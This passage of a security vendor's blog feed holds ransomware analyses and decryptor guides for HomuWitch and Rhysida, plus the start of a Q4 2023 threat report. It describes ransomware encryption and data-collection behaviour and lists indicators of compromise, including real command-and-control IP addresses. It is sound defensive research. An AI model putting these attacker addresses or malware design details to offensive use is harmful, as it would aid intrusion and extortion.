<p>Despite a decrease in HomuWitch activity recently, we will continue to closely monitor this threat.</p>
<p><a href="#usage">Skip to how to use the HomuWitch ransomware decryptor.</a></p>
<h4 class="wp-block-heading">About HomuWitch</h4>
<p>HomuWitch is a ransomware written in C# .NET. Its name comes from the file version information of the binary. Victims are usually infected via a SmokeLoader backdoor, masked as pirated software, which later installs a malicious dropper that executes the HomuWitch ransomware. Cases of infection are primarily found in two locations – Poland and Indonesia.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="660" height="413" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/dropper-snippet.png" alt="" class="wp-image-8095" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/dropper-snippet.png 660w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/dropper-snippet-300x188.png 300w" sizes="(max-width: 660px) 100vw, 660px" /><figcaption class="wp-element-caption"><em>Overview of the dropper responsible for HomuWitch ransomware</em></figcaption></figure></div>
<h4 class="wp-block-heading">HomuWitch Behavior</h4>
<p>After the execution begins, drive letters are enumerated and those with a size smaller than 3,500 MB – as well as current user’s directories for Pictures, Downloads, and Documents – are considered in the encryption process. Then, only files with specific extensions with size less than 55 MB are chosen to be encrypted. The list of the extensions contains following:</p>
<p><code>.pdf, .doc, .docx, .ppt, .pptx, .xls, .py, .rar, .zip, .7z, .txt, .mp4, .JPG, .PNG, .HEIC, .csv, .bbbbbbbbb</code></p>
<p>HomuWitch transforms the files with combination of Deflate algorithm for compression and AES-CBC algorithm for encryption, appending .homuencrypted extension to the filename. Most ransomware strains perform file encryption; HomuWitch also adds file compression. This causes the encrypted files to be smaller than originals.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="895" height="439" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/encryption-snippet.png" alt="" class="wp-image-8096" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/encryption-snippet.png 895w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/encryption-snippet-300x147.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/encryption-snippet-768x377.png 768w" sizes="(max-width: 895px) 100vw, 895px" /><figcaption class="wp-element-caption">HomuWitch file-encryption routine</figcaption></figure></div>
<p>HomuWitch contains a vulnerability present during the encryption process that allows the victims to retrieve all their files without paying the ransom. New or previously unknown samples may make use of different encryption schema, so they may not be decryptable without further analysis.</p>
<p>It is also using command-and-control (CnC) infrastructure for its operation, mostly located in Europe. Before encryption, HomuWitch sends the following personal information to its CnC servers:</p>
<p><code>Computer name, Country code, Keyboard layout, Device ID</code></p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="527" height="231" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/servers-snippet.png" alt="" class="wp-image-8097" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/servers-snippet.png 527w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/servers-snippet-300x131.png 300w" sizes="(max-width: 527px) 100vw, 527px" /><figcaption class="wp-element-caption">HomuWitch CnC communication</figcaption></figure></div>
<p>After encryption, a ransom note is either retrieved from the CnC server or (in some samples) is stored in the sample resources. The ransom typically varies $25 to $70, demanding the payment to be made with Monero cryptocurrency. Here is an example of HomuWitch ransom note:</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="925" height="486" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/ransomnote.png" alt="" class="wp-image-8098" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/ransomnote.png 925w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/ransomnote-300x158.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/ransomnote-768x404.png 768w" sizes="(max-width: 925px) 100vw, 925px" /></figure></div>
<h5 class="wp-block-heading" id="usage">How to use the Avast HomuWitch ransomware decryption tool to decrypt files encrypted by the ransomware</h5>
<p>Follow these steps to decrypt your files:</p>
<ol>
<li>Download the free decryptor <a href="https://files.avast.com/files/decryptor/avast_decryptor_homuwitch.exe">here</a>.</li>
<li>Run the executable file. It starts as a wizard, leading you through the configuration of the decryption process.</li>
<li>On the initial page, you can read the license information if you want, but you only need to click “Next”</li>
</ol>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="600" height="431" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/05.png" alt="" class="wp-image-8086" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/05.png 600w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/05-300x216.png 300w" sizes="(max-width: 600px) 100vw, 600px" /></figure>
<ol start="4">
<li>On the following page, select the list of locations you want to be searched for and decrypted. By default, it contains a list of all local drives:</li>
</ol>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="600" height="431" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/06.png" alt="" class="wp-image-8087" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/06.png 600w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/06-300x216.png 300w" sizes="(max-width: 600px) 100vw, 600px" /></figure>
<ol start="5">
<li>On the third page, you need to provide a file in its original form and one which was encrypted by the HomuWitch ransomware. Enter both names of the files. If you have an encryption password created by a previous run of the decryptor, you can select “I know the password for decrypting files” option:</li>
</ol>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="600" height="431" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/07.png" alt="" class="wp-image-8088" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/07.png 600w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/07-300x216.png 300w" sizes="(max-width: 600px) 100vw, 600px" /></figure>
<ol start="6">
<li>The next page is where the password cracking process takes place. Click “Start” when you are ready to start the process. The password cracking process uses all known HomuWitch passwords to determine the correct one.</li>
</ol>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="600" height="431" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/08.png" alt="" class="wp-image-8089" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/08.png 600w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/08-300x216.png 300w" sizes="(max-width: 600px) 100vw, 600px" /></figure>
<ol start="7">
<li>Once the password is found, you can proceed to decrypt all the encrypted files on your PC by clicking “Next”.</li>
</ol>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="600" height="431" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/09.png" alt="" class="wp-image-8090" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/09.png 600w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/09-300x216.png 300w" sizes="(max-width: 600px) 100vw, 600px" /></figure>
<ol start="8">
<li>On the final page, you can opt-in to back up your encrypted files. These backups may help if anything goes wrong during the decryption process. This option is on by default, which we recommend. After clicking “Decrypt” the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.</li>
</ol>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="600" height="431" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/10.png" alt="" class="wp-image-8091" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/10.png 600w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/10-300x216.png 300w" sizes="(max-width: 600px) 100vw, 600px" /></figure>
<h5 class="wp-block-heading">Indicators of Compromise (IoCs)</h5>
<p><strong>Samples (SHA256)</strong></p>
<p><code>03e4f770157c11d86d462cc4e9ebeddee3130565221700841a7239e68409accf<br>0e42c452b5795a974061712928d5005169126ad1201bd2b9490f377827528e5d<br>16c3eea8ed3a44ee22dad8e8aec0c8c6b43c23741498f11337779e6621d1fe4e<br>33dd6dfd51b79dad25357f07a8fb4da47cec010e0f8e6d164c546a18ad2a762c<br>3546b2dd517a99249ef5fd8dfd2a8fd80cb89dfdc9e38602e1f3115634789316<br>4ea00f1ffe2bbbf5476c0eb677ac75cf1a765fe5c8ce899f47eb8b344da878ed<br>6252cda4786396ebd7e9baf8ff0454d6af038aed48a7e4ec33cd9249816db2f4<br>9343a0714a0e159b1d49b591f0835398076af8c8e2da56cbb8c9b7a15c9707c8<br>bd90468f50629728d717c53cd7806ba59d6ad9377163d0d3328d6db4db6a3826<br>cd4c3db443dbfd768c59575ede3b1e26002277c109d39ea020d1bc307374e309<br>fd32a8c5cd211b057fdf3e7cc27167296c71e3fb42daa488649cdf81f58f6848</code></p>
<p><strong>Command-and-Control Servers</strong></p>
<figure class="wp-block-table"><table><tbody><tr><td>IP Address</td><td>Origin</td></tr><tr><td><code>78.142.0.42</code></td><td><code>US</code></td></tr><tr><td><code>79.137.207.233</code></td><td><code>Germany</code></td></tr><tr><td><code>185.216.68.97</code></td><td><code>Netherlands</code></td></tr><tr><td><code>193.164.150.225</code></td><td><code>Russia</code></td></tr></tbody></table></figure>
<p>IoCs are available at <a href="https://github.com/avast/ioc/tree/master/HomuWitch" target="_blank" rel="noreferrer noopener">https://github.com/avast/ioc/tree/master/HomuWitch</a></p>
<p>The post <a href="https://decoded.avast.io/threatresearch/decrypted-homuwitch-ransomware/">Decrypted: HomuWitch Ransomware</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></content:encoded>
</item>
<item>
<title>Decrypted: Rhysida Ransomware</title>
<link>https://decoded.avast.io/threatresearch/decrypted-rhysida-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-rhysida-ransomware</link>
<dc:creator><![CDATA[Threat Research Team]]></dc:creator>
<pubDate>Tue, 13 Feb 2024 11:44:42 +0000</pubDate>
<category><![CDATA[PC]]></category>
<category><![CDATA[decryptor]]></category>
<category><![CDATA[decryptors]]></category>
<category><![CDATA[ransomware]]></category>
<guid isPermaLink="false">https://decoded.avast.io/?p=8027</guid>
<description><![CDATA[<p>The team at Avast has developed a decryptor for the Rhysida ransomware and released it for public download. The Rhysida ransomware has been active since May 2023. As of Feb 2024, their TOR site lists 78 attacked companies, including IT (Information Technology) sector, healthcare, universities, and government organizations.</p>
<p>The post <a href="https://decoded.avast.io/threatresearch/decrypted-rhysida-ransomware/">Decrypted: Rhysida Ransomware</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></description>
<content:encoded><![CDATA[
<p>In October 2023, we published a <a href="https://decoded.avast.io/threatresearch/rhysida-ransomware-technical-analysis/">blog post containing technical analysis</a> of the Rhysida ransomware. What we intentionally omitted in the blog post was that we had been aware of a cryptographic vulnerability in this ransomware for several months and, since August 2023, we had covertly provided victims with our decryption tool. Thanks to our collaboration with law enforcement units, we were able to quietly assist numerous organizations by decrypting their files for free, enabling them to regain functionality. Given the <a href="https://thehackernews.com/2024/02/rhysida-ransomware-cracked-free.html">weakness in Rhysida ransomware was publicly disclosed</a> recently, we are now publicly releasing our decryptor for download to all victims of the Rhysida ransomware.</p>
<p>The Rhysida ransomware has been active since May 2023. As of Feb 2024, their TOR site lists 78 attacked companies, including IT (Information Technology) sector, healthcare, universities, and government organizations.</p>
<h2 class="wp-block-heading">Usage of the Decryptor</h2>
<p>Please, read the following instructions carefully. The rate of success depends on them.</p>
<p><strong>Several parameters of the infected PC affect the encryption (and decryption) of the files:</strong></p>
<ul>
<li>Set of the drive letters</li>
<li>Order of files</li>
<li>Number of CPU cores</li>
<li>Bitness of the executed ransomware sample</li>
<li>Format of files before encryption</li>
</ul>
<p><strong>For these reasons, the following rules must be obeyed while decrypting files:</strong></p>
<ul>
<li>The decryptor must be executed on the same machine where the files were encrypted</li>
<li>Password cracking process must be executed on the same machine where the files were encrypted</li>
<li>No files from another machine can be copied to the machine where the decryption process is performed</li>
<li>Text files (source files, INI files, XML, HTML, …) must have certain minimal size to be decryptable</li>
</ul>
<p>64-bit samples of the Rhysida encryptors are far more common. For that reason, default configuration of the decryptor assumes 64-bit encryptor. If you are sure that it was 32-bit version (for example, if you have 32-bit operating system), the decryptor can be switched to 32-bit mode by using the following command line parameter:</p>
<p><code>avast_decryptor_rhysida.exe /ptr:32</code></p>
<p>If you want to verify whether the decryption process will work without changing the files, you may use the “testing mode” of the decryptor. This mode is activated by the following command line parameter:</p>
<p><code>avast_decryptor_rhysida.exe /nodecrypt</code></p>
<p>The Rhysida decryptor also relies on the known file format. Common file formats, such as Office documents, archives, pictures, and multimedia files are already covered. If your encrypted data includes valuable documents in less common or proprietary formats, please, contact us at <a href="mailto:decryptors@avast.com">decryptors@avast.com</a>. We can analyze the file format and if possible, we add its support to the decryptor.</p>
<h2 class="wp-block-heading">Steps to Use the Decryptor</h2>
<ol>
<li>Download the decryptor <a href="https://files.avast.com/files/decryptor/avast_decryptor_rhysida.exe">here</a>.</li>
<li>Run the decryptor. Unless you need one or more command line modifications, you can simply run it by clicking on the downloaded file.</li>
<li>On the initial page, you must confirm that you are running the decryptor on the same PC where the files were encrypted. Click Yes, then the Next button when you are ready to start.</li>
</ol>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="608" height="437" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture1.png" alt="" class="wp-image-8028" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture1.png 608w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture1-300x216.png 300w" sizes="(max-width: 608px) 100vw, 608px" /></figure>
<ol start="4">
<li>Next page shows the list of drive letters on the PC. You may notice that it is in reverse order. Please, keep it as it is and click “Next.”</li>
</ol>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="608" height="437" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture2.png" alt="" class="wp-image-8029" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture2.png 608w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture2-300x216.png 300w" sizes="(max-width: 608px) 100vw, 608px" /></figure>
<ol start="5">
<li>The next screen requires you to enter an example of an encrypted file. In most cases, the decryptor picks the best file available for the password cracking process.</li>
</ol>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="608" height="437" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture3.png" alt="" class="wp-image-8030" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture3.png 608w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture3-300x216.png 300w" sizes="(max-width: 608px) 100vw, 608px" /></figure>
<ol start="6">
<li>The next page is where the password cracking process takes place. Click Start when you are ready to begin. This process usually only takes a few seconds but will require a large amount of system memory.</li>
</ol>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="608" height="437" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture4.png" alt="" class="wp-image-8031" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture4.png 608w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture4-300x216.png 300w" sizes="(max-width: 608px) 100vw, 608px" /></figure>
<ol start="7">
<li>Once the password is found, you can continue to decrypt all the encrypted files on your PC by clicking Next:</li>
</ol>
<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="608" height="437" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture5.png" alt="" class="wp-image-8032" style="width:608px;height:auto" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture5.png 608w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture5-300x216.png 300w" sizes="(max-width: 608px) 100vw, 608px" /></figure>
<ol start="8">
<li>On the final page, you can opt-in to back up your encrypted files. These backups may help if anything goes wrong during the decryption process. This choice is selected by default, which we recommend. After clicking Decrypt the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.</li>
</ol>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="608" height="437" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture6.png" alt="" class="wp-image-8033" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture6.png 608w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture6-300x216.png 300w" sizes="(max-width: 608px) 100vw, 608px" /></figure>
<p>For questions or comments about the Avast decryptor, email <a href="mailto:decryptors@avast.com">decryptors@avast.com</a>.</p>
<p>The post <a href="https://decoded.avast.io/threatresearch/decrypted-rhysida-ransomware/">Decrypted: Rhysida Ransomware</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></content:encoded>
</item>
<item>
<title>Avast Q4/2023 Threat Report</title>
<link>https://decoded.avast.io/threatresearch/avast-q4-2023-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=avast-q4-2023-threat-report</link>
<dc:creator><![CDATA[Threat Research Team]]></dc:creator>
<pubDate>Wed, 07 Feb 2024 14:00:00 +0000</pubDate>
<category><![CDATA[Mobile]]></category>
<category><![CDATA[PC]]></category>
<category><![CDATA[Reports]]></category>
<category><![CDATA[desktop]]></category>
<category><![CDATA[malware]]></category>
<category><![CDATA[mobile]]></category>
<category><![CDATA[report]]></category>
<category><![CDATA[risk]]></category>
<category><![CDATA[threats]]></category>
<guid isPermaLink="false">https://decoded.avast.io/?p=7936</guid>
<description><![CDATA[<p>10 Billion Attacks Blocked in 2023, Qakbot's Resurrection, and Google API Abused</p>
<p>The post <a href="https://decoded.avast.io/threatresearch/avast-q4-2023-threat-report/">Avast Q4/2023 Threat Report</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></description>
<content:encoded><![CDATA[
<h2 class="wp-block-heading">10 Billion Attacks Blocked in 2023, Qakbot’s Resurrection, and Google API Abused</h2>
<h3 class="wp-block-heading">Foreword</h3>
<p>Welcome to the new edition of our report. As we bid farewell to the year 2023, let’s briefly revisit the threat landscape that defined the past year. In 2023, the overall number of unique blocked attacks surged, reaching an unprecedented milestone of more than 10 billion attacks and a remarkable 49% increase year-over-year. This staggering figure, once considered unimaginable, now reflects the harsh reality of our digital landscape. The intensity of these attacks peaked in the final quarter, with a 17% quarter-on-quarter increase, and a monthly average exceeding 1.2 billion attacks.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="667" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Threat-Labs-infographic_2x-667x1024.png" alt="" class="wp-image-7941" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Threat-Labs-infographic_2x-667x1024.png 667w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Threat-Labs-infographic_2x-196x300.png 196w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Threat-Labs-infographic_2x-768x1178.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Threat-Labs-infographic_2x-1001x1536.png 1001w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Threat-Labs-infographic_2x-1335x2048.png 1335w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Threat-Labs-infographic_2x.png 1584w" sizes="(max-width: 667px) 100vw, 667px" /></figure></div>
<p>Q4/2023 was an exceptionally eventful period marked by a myriad of cyber threat developments. Our featured story navigates the intricate PDF threat landscape, unveiling the surge in digital document deception. Threat actors capitalized on PDF files, weaving a complex web of attacks ranging from dating scams and phishing attempts to sophisticated password stealers exemplified by AgentTesla.</p>
<p>In a notable turn of events, this quarter marked the (predicted by many) reappearance of Qakbot, previously dismantled by the FBI. Despite law enforcement efforts, Qakbot resurfaced in December, revealing intriguing overlaps in distribution with Pikabot. Additionally, the sextortion bot Twizt expanded its repertoire by incorporating brute forcing of VNC endpoints.</p>
<p>In a quarter filled with significant developments, a noteworthy trend emerged in the realm of info-stealers. While these threats experienced a slight uptick, what sets this period apart is the</p>
<p>inventive abuse of the Google OAuth API for recovering authentication cookies by Lumma, Rhadamanthys, and other stealers. This novel approach significantly amplifies the impact of their malicious activities.</p>
<p>While there was an overall decline in coinminers, a staggering 250% quarter-on-quarter surge in malicious coinmining in the USA, propelled by the widespread dissemination of XMRig, stood out. Furthermore, adware on desktop maintained a heightened activity level, employing new tricks such as swift DNS record switches for ad servers.</p>
<p>We also observed a subtle uptick in ransomware attacks, featuring prominent groups like LockBit and ALPHV/BlackCat in the headlines. Meanwhile, law enforcement and cybersecurity entities counteracted, exemplified by the release of free decryption tools for Babuk-Tortilla and BlackCat.</p>
<p>Notably, a year after the takedown of the NetWire RAT, its eradication was affirmed. However, it was swiftly replaced by prominent RATs, but also new ones such as zgRAT, Krasue, or SugarGh0st.</p>
<p class="has-text-align-left">Web threats continued to dominate, with scams, phishing, and malvertising ranking as the top threat types overall. The use of malicious browser push notifications escalated, becoming a preferred tool for scammers across various domains, from adult content sites to technical support scams, and financial frauds. Deepfake videos, especially those endorsing investment scams, displayed a heightened level of sophistication, challenging the ability to distinguish between real and fabricated content. Dating and romance scams, affecting approximately one in 20 of our users every month, showcased a global reach, expanding beyond western countries to target the Arab states and Asia. With Valentine’s Day approaching, an upward trend in these scams is anticipated. Furthermore, the conclusion of the year saw a surge in fake e-shops masquerading as renowned brands, leading unsuspecting victims into phishing traps.</p>
<p>Furthermore, the mobile threat landscape continued to evolve, witnessing the resurgence of the Chameleon banker and the insidious spread of SpyLoans on the PlayStore, posing serious threats, including physical violence blackmail.</p>
<p>Finally, as we venture into 2024, we anticipate a dynamic year ahead. Our team has ventured into the realm of predictions for 2024, foreseeing the evolving trends in cyber threats. While we hope our predictions do not come to fruition, and the digital space becomes safer than the close of 2023, your safety remains our top priority. Thank you for your trust in Avast. Enjoy the rest of the report.</p>
<p class="has-text-align-right"><em>Jakub Křoustek, Malware Research Director</em></p>
<h3 class="wp-block-heading">Methodology</h3>
<p>This report is structured into two main sections: Desktop-related threats, where we describe our intelligence around attacks targeting the Windows, Linux, and Mac operating systems, with a specific emphasis on web-related threats, and Mobile-related threats, where we describe the attacks focusing on Android and iOS operating systems.</p>
<p>We use the term “risk ratio” in this report to denote the severity of specific threats. It is calculated as a monthly average of “Number of attacked users / Number of active users in a given country.” Unless stated otherwise, calculated risks are only available for countries with more than 10,000 active users per month.</p>
<p>A blocked attack is defined as a unique combination of the protected user and a blocked threat identifier within the specified time frame.</p>
<h3 class="wp-block-heading">Featured Story: The PDF Threat Landscape</h3>
<p>In recent times, the cybersecurity landscape has seen a surge in sophisticated malware attacks, with cybercriminals exploiting various vectors to compromise systems and networks. One particularly concerning trend has been the expansion of malware threats through PDF files, a widely used format for document sharing and collaboration.</p>
<p>PDF files have long been a favored medium for sharing documents due to their platform-agnostic nature and consistent formatting across different devices and operating systems. However, this ubiquity has made them an attractive vector for cybercriminals seeking to deliver malware discreetly. Furthermore, PDF attachments are often allowed by default by spam gateways, adding another layer of vulnerability. What’s more, PDF files can be seamlessly opened on both PCs and mobile devices, making them the ultimate delivery payload, further amplifying their appeal as a method for delivering malicious payloads (for example embedding a malicious Word file into a PDF file). Additionally, attackers have begun using bogus URLs, often disguising them through services like the sLinks link shortener, in an effort to bypass antivirus scanners and heighten their chances of successful deployment.</p>
<p>Social engineering is always present in the work of cyberthreats, and we can analyze the typical behaviors used to fool users. One common example is a message that supposedly come from a known company, such as Amazon or some financial entity, with a clearly defined message, such as:</p>
<ol>
<li>Your account has been blocked.</li>
<li>You are given the means to unblock it.</li>
<li>If you don’t do it in 24 hours, you’ll lose access to your account forever.</li>
</ol>
<p>The sense of urgency is key in most scams, encouraging victims to act fast and not think twice about the situation. Some other scams are more subtle. The below example poses as Netflix, describing problems with your payment. The simple message – utilizing Netflix branding – indicates an issue with your payment and asks you to update your details:</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="774" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/023fabdd97b772dce6b266d38240d10e4d5d81b06d221fc246fb2b2a6706951d.pdf-e1707143782890-774x1024.png" alt="" class="wp-image-7942" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/023fabdd97b772dce6b266d38240d10e4d5d81b06d221fc246fb2b2a6706951d.pdf-e1707143782890-774x1024.png 774w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/023fabdd97b772dce6b266d38240d10e4d5d81b06d221fc246fb2b2a6706951d.pdf-e1707143782890-227x300.png 227w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/023fabdd97b772dce6b266d38240d10e4d5d81b06d221fc246fb2b2a6706951d.pdf-e1707143782890-768x1015.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/023fabdd97b772dce6b266d38240d10e4d5d81b06d221fc246fb2b2a6706951d.pdf-e1707143782890.png 931w" sizes="(max-width: 774px) 100vw, 774px" /><figcaption class="wp-element-caption">Phishing PDF – Netflix</figcaption></figure></div>
<p>Once you click the link, you are brought through the steps to enter your financial information, which is then taken by the malicious actors.</p>
<p>Another common scam is the good old lottery scam. In this scam, you’ve been awarded with some lottery prize (without even participating, how lucky!) and you are asked to send some personal details to receive the money. Of course, if you contact the scammers, they will ask you for some money in advance to pay the transfer fees.</p>
<p>Many types of attacks are suitable in PDF format – we have even seen dating scams, because… why not? But PDF-based attacks can also include malware, where the final payload will infect your device, as shown in the following example:</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="519" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1e512af2d4bc9aec5ead05d077c523a2eb88d29f58f96eab17f207c01e6dab54.pdf-1024x519.png" alt="" class="wp-image-7946"/><figcaption class="wp-element-caption">Malware PDF – final payload: AgentTesla</figcaption></figure></div>
<p>In recent malware campaigns, we have observed a spectrum of threats and scams, ranging from simple ones like lottery and dating scams, through phishing PDFs containing deceptive</p>
<p>information and a link to a phishing page, to complex campaigns delivering more sophisticated threats in JavaScript or embedded objects, culminating in strains such as AgentTesla, DarkGate, GuLoader, IcedID, RemcosRat, Ursnif, Qakbot or various APT groups. We have blocked more than 10 million PDF-based attacks, protecting more than 4 million users worldwide:</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="440" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pdf_stats-1024x440.png" alt="" class="wp-image-8019" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pdf_stats-1024x440.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pdf_stats-300x129.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pdf_stats-768x330.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pdf_stats-1128x484.png 1128w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pdf_stats.png 1227w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Pdf threats blocked in the last 6 months</figcaption></figure></div>
<p>The proliferation of PDF-based cyber threats underscores a significant shift in the tactics of cybercriminals. These attacks, ranging from simple scams to complex malware deliveries, demonstrate the adaptability and cunning of attackers in exploiting trusted digital mediums. PDF files, due to their ubiquity and inherent trust, have become a prime vector for a variety of malicious activities. This trend not only reflects the innovative methods of cybercriminals but also highlights the vulnerabilities inherent in everyday digital interactions.</p>
<p>The examples provided reveal a common thread: the exploitation of human psychology. The sense of urgency, the promise of rewards, and the fear of loss are leveraged to manipulate victims. Moreover, the transition from simple deception to sophisticated malware payloads like AgentTesla, DarkGate, and others, indicates a disturbing escalation in the severity of these threats.</p>
<p>Our analysis shows that, despite the diversity of these attacks, they share a reliance on social engineering and the exploitation of trusted channels. As we have successfully blocked a sizeable number of these attacks, it’s clear that robust cybersecurity measures can be highly effective. However, the battle is not solely technological. Education and awareness play a crucial role. Users must be vigilant, question the authenticity of unsolicited communications, and be aware of the signs of phishing and scams.</p>
<p class="has-text-align-right"><em>Luis Corrons, Security Evangelist</em><br><em>Branislav Kramár, Malware Analyst</em></p>
<h2 class="wp-block-heading">Desktop-Related Threats</h2>
<h3 class="wp-block-heading">Advanced Persistent Threats (APTs)</h3>
<p><em>An Advanced Persistent Threat (APT) is a type of cyberattack that is conducted by highly skilled and determined hackers who have the resources and expertise to penetrate a target’s network and maintain a long-term presence undetected.</em></p>
<p>The final quarter of 2023 has been marked by a series of sophisticated cyberattacks, underlining the persistent and evolving threats posed by Advanced Persistent Threat (APT) groups worldwide. These threat actors have demonstrated their capability and intent to target governmental and military entities, employing a range of techniques from spear-phishing to complex malware.</p>
<h6 class="wp-block-heading">Spyware Campaign Against Government Entities in the Philippines</h6>
<p>In the Philippines, government entities became the focus of a spyware campaign in Q4 2023. This operation utilized an infection chain that incorporated various techniques including spyware, PowerShell and .NET stealers, and spear-phishing as an infection vector. The complexity of this campaign was notable, with each stage employing different methods to infiltrate, monitor, and extract sensitive information from targeted systems. This demonstrates a high level of sophistication and resource investment.</p>
<h6 class="wp-block-heading">MustangPanda’s Diverse Geographic Targets</h6>
<p>MustangPanda, a well-known APT group, extended its operations across several countries, including Vietnam, Australia, the Philippines, Myanmar, and Taiwan. Their operations are marked using the well-known Korplug malware, demonstrating their preference for proven and effective tools in their cyber arsenal. Additionally, this group has been observed utilizing malware written in the Nim programming language. A key technique in their arsenal is the frequent use of sideloading, a method where they load malware by exploiting legitimate software processes.</p>
<h6 class="wp-block-heading">Attacks on the Pakistani Military</h6>
